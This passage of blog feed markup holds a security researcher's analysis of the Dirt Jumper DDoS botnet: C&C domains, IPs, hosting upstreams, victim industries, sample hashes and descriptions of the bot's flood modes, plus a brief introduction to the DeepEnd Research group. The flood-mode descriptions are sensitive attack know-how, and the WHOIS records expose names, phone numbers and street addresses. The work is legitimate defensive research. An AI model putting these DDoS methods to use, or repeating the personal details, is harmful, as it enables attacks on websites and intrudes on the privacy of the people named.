clientDeleteProhibited</span></div><div><span class="Apple-style-span" style="font-size: small;">Status: clientTransferProhibited</span></div><div><span class="Apple-style-span" style="font-size: small;">Updated Date: 19-jun-2011</span></div><div><span class="Apple-style-span" style="font-size: small;">Creation Date: 18-feb-2011</span></div><div><span class="Apple-style-span" style="font-size: small;">Expiration Date: 18-feb-2012</span></div><div><span class="Apple-style-span" style="font-size: small;">Registrant Contact:</span></div><div><span class="Apple-style-span" style="font-size: small;">Mark Livingston</span></div><div><span class="Apple-style-span" style="font-size: small;">Mark Livingston j.hnvns.92@gmail.com</span></div><div><span class="Apple-style-span" style="font-size: small;">+1.2147899961 fax: +1.2147899961</span></div><div><span class="Apple-style-span" style="font-size: small;">446 Ridge Point drive</span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span"> Forney TX 75126</span><span class="Apple-style-span"> </span></span></div></blockquote></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;">As of this writing, DNS results show that the C&C is running on IP address, 195.3.145.87 which managed by Altnet-Latvia (ASN41390). </span>There are several other domains and nameservers running on that IP address, including: </span><br />
<div></div><ul><li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">bestdumps.biz</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">lost-pass.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">mail.asdaddddaaaa.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">mittmax.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns1.euro-2012portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns1.euro2012-portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns2.euro-2012portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">ns2.euro2012-portal.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">open-pass.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">pizdaruliu.net</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">skachatiskype.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">skype4download.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.mittmax.com</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.skype-rf.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">www.skype4download.ru</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">xaker.me </span></li>
</ul><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Prior to hosting on Altnet-Latvia (ASN41390), asdaddddaaaa.com was utilizing the following IP addresses and providers for its domain hosting:</span><br />
<div></div><ul><li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.108.225.57 - AS50244 - ITELECOM - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.108.225.60 - AS50244 - ITELECOM - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.108.225.72 - AS50244 - ITELECOM - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.130.141 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.130.150 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.131.5 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.131.7 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">46.252.131.9 - Sagade - Latvia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">94.244.80.217 - AS25190 - Kauno Interneto Sistemos - Lithuania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">95.64.50.30 - AS48266 - Netserv Consult - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">141.136.16.100 - AS50515 - TIER-DATA-CENTER - Romania</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">223.25.242.107 - AS55720 - GIGABIT- Malaysia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">223.25.242.196 - AS55720 - GIGABIT- Malaysia</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">195.3.145.87 - AS41390 - RN-DATA - Latvia</span></li>
</ul><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">It is often interesting to trace the routing information of the hosting provider in question. The diagram below was produced using BGPlay. BGPlay displays the routing information for a network prefix for a defined time period. In this case, I ran BGPlay for the prefix 195.3.144.0/22 from 09/9/2011 thru 10/9/2011. From the results, you can see that during this time, Altnet-Latvia had Telenet SIA in Latvia (ASN24589), as its only upstream. Walking "up the upstream", we see the following relationships:</span><br />
<div style="font-family: Verdana, sans-serif;"><br />
</div></div><div><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;"> </span> </div><div style="font-family: Verdana, sans-serif;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSBsSwhekP90fMgaWi4tcCiVd_GfPYXAqZR7ACKZu2wW_3ahMG3_WnLfmT8bqN6LmQC9mKyM_2G0q6ncS2ZnWWX2erAfHiZIRvsjs45sRMvvRC1C3CFbsZ-lZqfdTDMYjsSDD1_jdHD3o/s1600/bgp.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSBsSwhekP90fMgaWi4tcCiVd_GfPYXAqZR7ACKZu2wW_3ahMG3_WnLfmT8bqN6LmQC9mKyM_2G0q6ncS2ZnWWX2erAfHiZIRvsjs45sRMvvRC1C3CFbsZ-lZqfdTDMYjsSDD1_jdHD3o/s640/bgp.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">BGPlay information for Altnet-Latvia (AS41390)</td></tr>
</tbody></table><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"> </span></span></span></div><div style="font-family: Verdana, sans-serif;"><div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"> Telenet SIA (ASN24589) is the sole upstream for Alnet-Latvia</span></span></span></div></div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span">BKCNet Latvia (ASN6851) is the sole upstream for Telenet SIA</span></span></span></div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span">Telia Latvija (ASN5518) is the sole upstream for BKCNet Latvia</span></span></span></div><div style="text-align: center;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span">TeliaNet Sweden (ASN1299) is the sole upstream for Telia Latvija</span></span></span><br />
<span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"><br />
</span></span></span></div><div style="text-align: left;"><span style="font-size: small;"> </span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FqtZErzgb5prI3C4zWTgf9vf3sarvLaUi1eneldr3U_1qfs23HVJNDHEQTA21YRrWxlJhVjVRq2PcW_VLTIfFxdgCvp27IpiclYzM71_3r3w-1rnFhY2nZyBDV-1cEqF2Ac5xjp52bgj/s1600/routeviews.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FqtZErzgb5prI3C4zWTgf9vf3sarvLaUi1eneldr3U_1qfs23HVJNDHEQTA21YRrWxlJhVjVRq2PcW_VLTIfFxdgCvp27IpiclYzM71_3r3w-1rnFhY2nZyBDV-1cEqF2Ac5xjp52bgj/s1600/routeviews.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span class="Apple-style-span" style="font-size: small;">Routeviews BGP Information for IP 195.3.145.87</span></td></tr>
</tbody></table><div style="text-align: left;"><span style="font-size: small;"><span class="Apple-style-span"><span class="Apple-style-span"> </span></span></span></div></div><div><span style="font-family: Verdana,sans-serif; font-size: small;">Based on additional research I did, it's very clear that this Dirt Jumper C&C isn't the only malicious activity on Alnet-Latvia.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><a href="http://www.phishtank.com/asn_search.php?asn=41390&valid=All&active=All&Search=Search">PhishTank Report</a></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL107154">Spamhaus Report</a></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><a href="http://malc0de.com/database/index.php?search=41390&ASN=on">malc0de Report</a></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span style="font-size: small;">I wonder if the folks at TeliaNet Sweden, or the other upstreams to Alnet-Latvia are aware of this? This would also be a good time to remind hosting providers, ISPs, and network operators to subscribe to the <a href="http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork">Shadowserver ASN & Netblock Reporting Service.</a> </span><b> </b></span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span><br />
<span style="font-family: Verdana,sans-serif;"><b><span class="Apple-style-span" style="font-size: large;"><u>DDoS Victims</u></span></b> </span><br />
<span style="font-family: Verdana,sans-serif; font-size: small;">This is a very active DDoS bot, with a wide variety of targets across many industries. Over a two week observation period, the asdaddddaaaa.com controller has targeted victims in the following industries: </span><br />
<div style="font-family: Verdana, sans-serif;"></div><ul style="font-family: Verdana, sans-serif;"><li><span style="font-size: small;">Aviation Products and Services</span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUaWQxV-U8xt2sICagpT7LSX0JOaqq_XQVJcQXN0DPcVSVu9NVZBdaBpNsroDd_IsI7QDrz56sDKMekMxznour7ZTlCseg-Gq27fkzjLzGDpwkYekE2DyppPhQvAuxjVNT6kjfyAfIMKKd/s1600/AllSites.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUaWQxV-U8xt2sICagpT7LSX0JOaqq_XQVJcQXN0DPcVSVu9NVZBdaBpNsroDd_IsI7QDrz56sDKMekMxznour7ZTlCseg-Gq27fkzjLzGDpwkYekE2DyppPhQvAuxjVNT6kjfyAfIMKKd/s400/AllSites.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> <span style="font-size: x-small;"><span style="color: black; font-size: x-small;"><span style="font-family: Arial; font-size: x-small;">Host-tracker.com showing problems<br />
experienced by targeted domains</span></span></span></td></tr>
</tbody></table></li>
<li><span style="font-size: small;">Porn sites </span></li>
<li><span style="font-size: small;">Cargo and Shipping </span></li>
<li><span style="font-size: small;">Jewelry </span></li>
<li><span style="font-size: small;">Auto Dealer Services </span></li>
<li><span style="font-size: small;">Real Estate </span></li>
<li><span style="font-size: small;">Wholesale Shopping</span></li>
<li><span style="font-size: small;">Audio Products </span></li>
<li><span style="font-size: small;"> Classified ad sites </span></li>
<li><span style="font-size: small;">Office Space providers </span></li>
<li><span style="font-size: small;">Online Forex Trading </span></li>
<li><span style="font-size: small;">Clothing and Gifts </span></li>
</ul></div><div><span style="font-family: Verdana,sans-serif; font-size: small;"><br />
</span><br />
<span style="font-family: Verdana,sans-serif; font-size: small;">As described in more detail later in this post, we have detected several other C&Cs that appear to be related to the same group operating asdaddddaaaa.com. Several of them continue to actively initiate DDoS attacks. We are currently monitoring these controllers and sharing the victim lists with appropriate law enforcement agencies and the victim organizations.</span><br />
<div style="font-family: Verdana, sans-serif;"><br />
</div><hr style="font-family: Verdana, sans-serif;" /></div><div style="font-family: Verdana, sans-serif;"><span style="font-size: large;"><b>4. Dirt Jumper current versions and general information</b></span><span style="font-size: small;"></span><br />
<br />
The bot is binary is relatively large, 170-270 kB and is packed with UPX. The bot tasks are not encrypted as you can see in the pcaps and on the C&C server.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuQ6CgAh7e6gblCIF_9MRPsOM2bAmHDAdVGQech3IINbDfMqkAsDSALx8c19uos2MrBEEV8A4ze6HCg3XtqusUpqO3qd5x4QG2G6yPNLTi3QHyY5jw8KHuO5vQIh7hLebfuetPhsXXR7O/s1600/task.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuQ6CgAh7e6gblCIF_9MRPsOM2bAmHDAdVGQech3IINbDfMqkAsDSALx8c19uos2MrBEEV8A4ze6HCg3XtqusUpqO3qd5x4QG2G6yPNLTi3QHyY5jw8KHuO5vQIh7hLebfuetPhsXXR7O/s320/task.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DDoS task for bots as seen on a C&C page</td></tr>
</tbody></table><span class="Apple-style-span" style="font-size: large;"><b><u> </u></b></span><br />
<u><b><span class="Apple-style-span" style="font-size: large;">Current Dirt Jumper Versions and Features</span></b></u><br />
<br />
<span style="font-size: small;"><u><b>Version 3, "September", and private versions - 2011</b></u></span><br />
<b><u><br />
</u></b><br />
<ul><span style="font-size: small;">
<li><b>Multipurpose flood (Light) </b>– combination type of attack when packages with random data sent to the server. The bot uses a varying User Agent <table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s1600/944djs.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s320/944djs.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Control Panel. Img.src: shopworld.biz</td></tr>
</tbody></table>and referer, receives and sends cookies, builds packages of different lengths, different types of content, changes timeout and sending rate.</li>
<li><b>Multipurpose flood (Full)</b> – Same as Multipurpose flood (Light) but POST data is added POST requests will exhaust server resources due to its need to process the data, requiring participation of apache, php, and any linked database. This also helps to avoid Anti-DDoS measures because it imitates random browser requests. </li>
<li><b>HTTP flood (DJSFlood)</b> – The author claims it is unique to his bot. The method is very similar to simple http, but at the same time is not standard structure. It's “something between http and udp”. This method can be used for port attacks. The syntax is: http://IP:PORT/ with 300-500 threads</li>
<li><b>POST flood (TimeOut) </b>- Same as above, but it is possible to send data using POST. There is the way to set timeouts for response after sending the data.</li>
</span></ul><span style="font-size: small;">Other features</span><br />
<ul><span style="font-size: small;">
<li>Works with http, https</li>
<li>Varied User Agent and Referer </li>
<li>Multithreading, can attack up to 999 websites simultaneously</li>
<li>Can attack by IP, domain name, port, ftp</li>
<li>Access to the admin panel may be limited by IP. Additionally, the first level login page can be accessed only by specifying the correct GET-Passwd. The correct password then allows access to the next level, the regular login page.</li>
<li>Can attack up to 999 sites simultaneously </li>
</span></ul><span style="font-size: small;"><u><b><br />
</b></u></span><br />
<span style="font-size: small;"><u><b>Version 2 - 2010</b></u></span> <br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYINsuf-Yxf70uyVb5GRh7g-a5jqRxGjPovQDxbK6b8C5OcwjGQgqeYyshmci4ziAeMIvx3o70CUp_0hbDaKKGi4KcOydjMtNB6fAEFOe_3u2zvgDcX0yRg7RTm0SYKYg9fK3vl2b876/s1600/dj2.JPG" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYINsuf-Yxf70uyVb5GRh7g-a5jqRxGjPovQDxbK6b8C5OcwjGQgqeYyshmci4ziAeMIvx3o70CUp_0hbDaKKGi4KcOydjMtNB6fAEFOe_3u2zvgDcX0yRg7RTm0SYKYg9fK3vl2b876/s320/dj2.JPG" width="320" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dirt Jumper v.2 Img.Src: Damagelab.org</span></td></tr>
</tbody></table><ul><span style="font-size: small;">
<li><b>HTTP flood:</b> This type of attack can cause server overload due to frequent, repeated conventional HTTP requests. As soon as the webserver is ready to answer, the bot breaks the connection and sends a new request </li>
<li><b>Synchronous flood:</b> This method of attack is effective only when more than 150 threads in use. The bot makes 150+ simultaneous requests, waits until the server responds and repeats it </li>
<li><b>Downloading flood:</b> The bots download files from the website causing bandwidth saturation. </li>
<li><b>POST flood: </b> The bot can make GET and POST requests at the same time. That is, it can send a random usernames and passwords to website forms, causing a tremendous load on the server </li>
</span></ul><span style="font-size: small;">Other features are the same as you see above in Version 3. </span><br />
<br />
<br />
<span style="font-size: small;"><u><b>Version 1 </b></u></span></div><div style="font-family: Verdana, sans-serif;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLKEczc5NLSZyeinVJmTtxfBBK5Y9yLphrZogat2okpfWVkI-GDCN1HA5-Fe9j7rld5IyDcmPHU6fIaWOm0ShukZvmfD3LtJma8YRLZxl1O5GSWdupgbcQpqlEghb0Tp0a9JCgDSL0CNR/s1600/DJ1.JPG" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLKEczc5NLSZyeinVJmTtxfBBK5Y9yLphrZogat2okpfWVkI-GDCN1HA5-Fe9j7rld5IyDcmPHU6fIaWOm0ShukZvmfD3LtJma8YRLZxl1O5GSWdupgbcQpqlEghb0Tp0a9JCgDSL0CNR/s320/DJ1.JPG" width="320" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dirt Jumper v.1 Control Panel. Img.Src: xaknet.ru</span></td></tr>
</tbody></table><span style="font-size: small;">There is not much information about version 1 available. The one description found is the following:</span></div><div><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;"><b> </b></span> </div><ul style="font-family: Verdana, sans-serif;"><span style="font-size: small;">
<li>Multithreaded attack, number of threads can be changed without interrupting the attack</li>
<li>Can attack http, https</li>
<li>Can attack by DOMAIN:PORT </li>
<li>Can attack several sites at once</li>
<li>Can set up the time when you need to bot to call back</li>
<li>Can change User Agent</li>
<li>Bot is installed as a system service</li>
<li>The bot owner can choose the name of the bot process </li>
</span></ul><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;"> </span> <span style="font-size: small;"></span></div><hr style="font-family: Verdana, sans-serif;" /><div style="font-family: Verdana, sans-serif;"></div><div style="font-family: Verdana, sans-serif;"><span style="font-size: large;"><b>5. Review of other samples, command and control servers and DDoS actor groups</b></span></div><div style="font-family: Verdana, sans-serif;"></div><span style="font-family: Verdana,sans-serif; font-size: small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Analysis of Dirt Jumper C&C servers and their victims was based on publicly available sandbox results from Threatexpert.com, Sssdsandbox.net, Anubis.iseclab.org, and others. The search yielded two dozen C&C servers with groups attackers that utilize both types of the bot described in Section <i>1 of this post, Binary analysis and comparison. </i>These were frequently seen on the same domains. For example, http://wow-siti.ru/www/m_d.php (type 1) and http://wow-siti.ru/1/index.php (type 2)</span><br />
<span style="font-family: Verdana,sans-serif; font-size: small;"> <br />
The results showed similar naming conventions for the bot executable file name that is normally chosen by the botnet owner. This was seen as identical names or often starting with "sv" like in "sviooue.exe" and "svgtook.exe", as well as the GET or POST URLs for the drone. </span><br />
<br />
<span style="font-family: Verdana,sans-serif; font-size: small;">In addition, some C&C servers had a history of being hosted on same IP addresses in the past and being moved simultaneously from one hosting provider to another. Other attribution points included seeing the same email addresses in the domain registration, and similar domain names (e.g.<i>xruw0q.com</i>, <i>zprw6q.com</i> and <i>xzrw0q.com</i>; <i>jfasfasfasfasf.com</i> and <i>asdaddddaaaa.com</i>). The resulting matrix clearly shows that seemingly unrelated C&C servers may be operated by the same actors.</span><br />
<br />
<div style="font-family: Verdana, sans-serif;"></div><div class="separator" style="clear: both; font-family: Verdana, sans-serif; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMdldxADlAOIhJRFDy71L6Doa3716jAZW9mTyie2RGNT24Dg4R1U97RvpIvHMVu4kNvLmJRf03zFF2u0DUcD2JNdcp6at8fMROjLMafrE6cLOZqGXuEB5d8Hgn3Y0fCH9U5_4bcAE9CRIC/s1600/groups.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMdldxADlAOIhJRFDy71L6Doa3716jAZW9mTyie2RGNT24Dg4R1U97RvpIvHMVu4kNvLmJRf03zFF2u0DUcD2JNdcp6at8fMROjLMafrE6cLOZqGXuEB5d8Hgn3Y0fCH9U5_4bcAE9CRIC/s640/groups.JPG" width="640" /></a></div></div></div><blockquote><blockquote><div style="background-color: #d9ead3; color: black; text-align: center;"><b>Group 1</b></div><div style="background-color: #d9ead3; color: black; text-align: center;">(abacava.net + asdaddddaaaa.com)</div><div style="background-color: #d9ead3; color: black; text-align: center;">Same email address in domain registration, same hosting</div><div style="background-color: #d9ead3; color: black; text-align: center;">+</div><div style="background-color: #d9ead3; color: black; text-align: center;">(jfasfasfasfasf.com)</div><div style="background-color: #d9ead3; color: black; text-align: center;">History of hosting on the same domains as C&C above</div><div style="background-color: #d9ead3; color: black; text-align: center;">+</div><div style="background-color: #d9ead3; color: black; text-align: center;">(xzrw0q.com+whozdadx.org)<br />
Same bot name</div><div style="background-color: #d9ead3; color: black; text-align: center;">+</div><div style="background-color: #d9ead3; color: black; text-align: center;">(xruw0q.com+zprw6q.com)</div><div style="background-color: #d9ead3; color: black; text-align: center;">same domain naming convention as in xzrw0q.com above</div></blockquote></blockquote><blockquote><blockquote><div style="background-color: #d0e0e3; color: black; text-align: center;"><b>Group 2</b></div><div style="background-color: #d0e0e3; color: black; text-align: center;">(wow-siti.ru + mwas.ru)</div><div style="background-color: #d0e0e3; color: black; text-align: center;">Same email address in domain registration, same hostng</div><div style="background-color: #d0e0e3; color: black; text-align: center;">+</div><div style="background-color: #d0e0e3; color: black; text-align: center;">(s0r.ru)</div><div style="background-color: #d0e0e3; color: black; text-align: center;">Same hosting</div><div style="background-color: #d0e0e3; color: black; text-align: center;">+</div><div style="background-color: #d0e0e3; color: black; text-align: center;">(95.211.63.38) -</div><div style="background-color: #d0e0e3; color: black; text-align: center;">Same bot file name </div></blockquote></blockquote><a href="http://www.blogger.com/post-edit.g?blogID=6857062337696182667&postID=2883667917250480202&from=pencil" name="more"></a><br />
<br />
<div style="border: 3px solid gray; height: 120px; overflow: auto; text-align: left; width: 820px;"><b>exe name CC IP IP location Domain URL Domain owner MD5</b><br />
<br />
klhkg.exe 195.3.145.220 RN Data, SIA Latvia http://abacava.net/s4/index.php Phinney Business Skye Phinney jh.nvns.92@gmail.com +1.7814548993 fax: +1.6612830438 8536 Kern canyon Road, Sp 35 Bakersfield CA 93306 United States 4C01B3D5B80E18CE2E981E25740B395A<br />
<br />
svdhalp.exe 195.3.145.220 RN Data, SIA Latvia http://abacava.net/f2/m_d.php Phinney Business Skye Phinney jh.nvns.92@gmail.com 2cc731473ef8d968050aa2c9e914150d<br />
<br />
svgtook.exe 195.3.145.87 RN Data, SIA Latvia http://asdaddddaaaa.com/678/index.php Mark Livingston Mark Livingston j.hnvns.92@gmail.com +1.2147899961 fax: +1.2147899961 446 Ridge Point drive Forney TX 75126 United States f9a65bc3a197600d23557eceb1f3125c<br />
<br />
svcghkkjl.exe 46.108.225.72 Pixel View SRL Romania http://jfasfasfasfasf.com/887/index.php Hartford Business Joe Hartford bezerosavyk@yahoo.com +1.7814548993 fax: +1.7814548993 32 Cedar Street,Apt. #4 Waltham MA 02453 United States C0FCBF7B96474DCF074339575EC1EF3B<br />
<br />
svdhalp.exe 31.192.109.164 Mir Telematiki Ltd Russia http://xzrw0q.com/driver32/update/m_d.php BIZCN.COM, INC. f7c0314fb0fbd52af9d4d721b2c897a2<br />
<br />
sviooue.exe 31.192.109.162 Ultra Web Solutions India http://xruw0q.com/fcfxD/load.php No. 61 Wanghai Road, Xiamen Software Park xiamen fujian 361008 China 6D54FB6753D719CA3EC991A9CBD9743C<br />
<br />
svdhalp.exe 77.79.11.86 Webhosting, Lithuania http://whozdadx.org/c4/m_d.php Jabon Lorkan Inconmun Klopi 12 New-York 627f2bda0c5abe4d3e7ae68b877dcfd0<br />
<br />
sviooue.exe 91.217.153.114 Alexey Klimenko Ukraine http://zprw6q.com/frexpex/index.php Whois Privacy gmvjcxkxhs@whoisservices.cn 79a9327dd9f9911c0f08fd4d3c3b26c8<br />
<br />
svajnager.exe 184.22.118.89 NOC Scranton PA http://wow-siti.ru/1/index.php Private Person vzlomaem@xaker.ru ns1.antiddos-servis.ru. ns2.antiddos-servis.ru. 9277796C0F8EBF1078C52D88E8FAAA5D<br />
<br />
svflooje.exe 184.22.118.89 NOC Scranton PA s0r.ru Private Person qwer.vdv@gmail.com 7CA86FB5C76B74390B4E7200E4A09514<br />
<br />
svflooje.exe 184.22.118.89 NOC Scranton PA unknown unknown E7B65933F069A81AB089D055D6BDD17A<br />
svflooje.exe 184.22.243.172 NOC Los Angeles CA http://mwas.ru/666/index.php Private Person vzlomaem@xaker.ru ns1.reg.ru. ns2.reg.ru. 6f610c089205a6433fc56c58e30840d1<br />
<br />
svflooje.exe 95.211.63.38 LeaseWeb Netherlands http://95.211.63.38/index.php ip 5998968B6B92E8B8076A8D846C75B855<br />
<br />
svsysnt.exe 78.108.84.160 Majordomo Llc Russia http://startraider.com/login/index.php smk.majordomo.ru Alex Leman () Fax: 226 E 45th St New York, NY 10017 United States D65C7F3B29F162F4104FC150614D5BE7<br />
<br />
kmhfoot.exe 195.189.226.193 SERVER.UA Ukraine http://nntudazashel.ru/dj/a.php Private Person root@dgrad-host.ru ns1.vainet.ru. ns2.vainet.ru. fb88c02090d9a42fef851b600fd8ec8<br />
<br />
svciyyyt.exe 46.252.130.102 users Latvia Andrejs Kaminskis http://46.252.130.102/www/index.php ip 4E89DF9540358C4524597856D6A08032<br />
unknown 80.79.118.230 Aktsiaselts WaveCom Estonia http://hotklass.com/a2/index.php PrivacyProtect.org Domain Admin (contact@privacyprotect.org ) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 Australia Tel. +45.369466 ac65790032bbcdc7f35dce0c0e43c434<br />
<br />
svlanager.exe 94.244.80.5 UAB KIS Lithuania unknown unknown 54DC76D3F0930A88211207453343E5008BA0161E<br />
<br />
svlkanager.exe unknown unknown unknown unknown CDBF7C49E3FDDAACC3154F13CE93521D<br />
svcgoow.exe unknown unknown unknown unknown f268ee8e4a5091139e5986b23389e80e</div></div>Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-7583876200587627252011-10-10T23:17:00.003-04:002011-10-19T12:55:54.571-04:00Welcome to DeepEnd Research<div>We are pleased to introduce DeepEnd Research, an independent information security research group that will focus on threat and intelligence analysis. Our emphasis will be on malware, exploit analysis, botnet tracking, the underground economy and overall cyberthreats. We will blog about various collection and analysis techniques, observations, and other areas of interest.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"></div>Another primary goal of DeepEnd Research is to foster collaborative research and analysis efforts with other security groups and organizations. We welcome any opportunities or inquiries as to projects involving common areas of interest.</div><div><br /></div><div>Thank you for visiting, and please feel free to contact any of the contributors via the email address listed in their profile.</div><div><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"></div><br /></div>Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com2